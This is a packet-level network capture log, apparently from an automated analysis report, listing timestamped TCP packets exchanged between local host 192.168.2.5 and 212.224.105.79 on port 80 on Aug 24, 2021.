Aug 24, 2021 08:49:13.818892956 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818896055 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818916082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818938971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818959951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818977118 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818979979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818985939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819008112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819030046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819051027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819067001 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819071054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819073915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819096088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819139004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819163084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819173098 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819178104 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819185019 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819209099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819230080 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819231033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819252968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819273949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819295883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819317102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819325924 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819338083 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819339037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819360018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819384098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819406033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819411993 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819417000 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819427967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819449902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819470882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819492102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819504976 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819509029 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819514990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819535971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819560051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819583893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819583893 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819588900 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819605112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819626093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819647074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819657087 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819663048 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819668055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819690943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819714069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819736958 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819736958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819740057 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819761992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819783926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819806099 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819806099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819808960 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819835901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819858074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819876909 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819880009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819880962 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819902897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819924116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819947004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819953918 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819958925 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.819968939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.819993973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820017099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820038080 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820038080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820041895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820061922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820086002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820107937 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820108891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820113897 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820117950 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820132017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820152998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820163012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820179939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820203066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820221901 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820225954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820225954 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820246935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820271015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820292950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820305109 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820308924 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820316076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820337057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820364952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820389986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820393085 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820396900 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820415020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820437908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820458889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820460081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820466042 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820483923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820507050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820528984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820553064 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820557117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820564032 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820581913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820607901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820625067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820630074 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820631027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.820682049 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.820729017 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.821033955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.843797922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.843838930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.843859911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.843883038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.843903065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.843921900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.843977928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844013929 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.844014883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844120026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844130039 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.844136000 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.844145060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844170094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844192028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844192982 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.844216108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844238043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844259977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844271898 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.844276905 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.844280958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844302893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844322920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844331980 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.844336033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.844345093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844366074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844391108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844413042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.844413042 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.844417095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.844508886 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.844512939 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:14.095854044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.136529922 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:14.159806013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.161663055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.175436020 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:14.205049992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.205656052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.205730915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.205738068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.205811024 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:14.205837965 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:14.231975079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.232012987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.232037067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.232060909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.232084990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.232104063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.232186079 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:14.232213020 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:14.832829952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:14.832889080 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:14.855015039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.877988100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.904623985 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:14.904717922 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:14.927464008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.983452082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.983477116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.983489990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.983508110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.983524084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.983539104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.983552933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.983567953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.983583927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.983582020 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:14.983603001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:14.983619928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:14.983643055 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.008812904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.008843899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.008863926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.008883953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.008903980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.008908033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.008928061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.008934975 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.008950949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.008969069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.008989096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.009000063 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.009010077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.009033918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.009036064 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.009057999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.009061098 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.009079933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.009095907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.009109974 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.009115934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.009140015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.009144068 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.009161949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.009181976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.009185076 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.009205103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.009221077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.009244919 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.009279966 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031346083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031378984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031398058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031418085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031434059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031443119 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031454086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031476974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031491041 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031492949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031519890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031546116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031568050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031574011 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031605005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031610966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031611919 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031620026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031635046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031651020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031666994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031680107 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031686068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031703949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031713009 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031721115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031735897 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031737089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031750917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031761885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031770945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031776905 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031800985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031814098 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031819105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031836987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031836987 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031852961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031861067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031869888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031884909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031896114 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031900883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031917095 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031929970 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031932116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031944990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031960964 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031961918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031979084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.031990051 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.031995058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.032011032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.032026052 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.032030106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.032047987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.032053947 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.032104969 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054164886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054187059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054205894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054227114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054253101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054260969 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054282904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054299116 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054308891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054327011 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054330111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054356098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054374933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054387093 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054397106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054419994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054425001 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054450035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054464102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054474115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054495096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054514885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054516077 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054538012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054557085 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054563999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054586887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054608107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054610968 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054630041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054646969 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054650068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054672003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054687023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054693937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054716110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054733992 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054739952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054761887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054780006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054783106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054805994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054827929 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054827929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054852962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054873943 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054879904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054908037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054919958 CEST	49712	80	192.168.2.5	212.224.105.79
